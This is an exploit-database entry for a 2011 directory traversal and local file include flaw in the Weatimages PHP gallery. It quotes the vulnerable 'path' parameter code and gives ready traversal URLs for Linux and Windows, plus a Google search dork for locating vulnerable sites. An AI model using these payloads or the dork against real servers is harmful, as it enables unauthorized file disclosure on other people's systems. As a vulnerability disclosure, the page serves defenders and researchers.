header-logo
Suggest Exploit
vendor:
Weatimages
by:
e.wiZz!
8.8
CVSS
HIGH
Directory Traversal & Local File Include
22
CWE
Product Name: Weatimages
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2011

Weatimages Directory Traversal&Local File Include Vulnerabilities

Weatimages is vulnerable to directory traversal and local file include attacks. An attacker can use the 'path' parameter in the index.php file to traverse directories and include local files. This vulnerability can be exploited on both Linux and Windows servers.

Mitigation:

Ensure that user input is properly sanitized and validated.
Source

Exploit-DB raw data:

Weatimages Directory Traversal&Local File Include Vulnerabilities

By: e.wiZz!


############Script info:

############Site: http://nazarkin.name/projects/weatimages/download.php



In the wild...

#######################################################


#######index.php:

...

//kill oneself if user trying to access resource with '/../' in path
if (strstr(urldecode($_SERVER['REQUEST_URI']), '/../')) { fatal_error('Suspicious query rejected'); }

...

if (!$REQUEST_PATH) {
	if ($_GET['path']) { //compatibility mode enabled and we have some path
		$REQUEST_PATH = $_GET['path'];
		$SERVER_PHP_SELF = $_SERVER['SCRIPT_NAME'] . '/' . $REQUEST_PATH . '/';
	}
	else { //we are in the root directory
		$REQUEST_PATH = '.';
	}
}

...

...huh, did you know there are Windows servers?

#####List files in directory you want(linux):

http://inthewild/index.php?path=../
http://inthewild/index.php?path=../..

##### Windows?:

http://inthewild/index.php?path=..\anything


########Dork:
http://www.google.ba/#hl=bs&q=%22Powered+by+Weatimages%22&start=20&sa=N&fp=73afe0b6734a45d2  (google says 200 000,i dont trust them)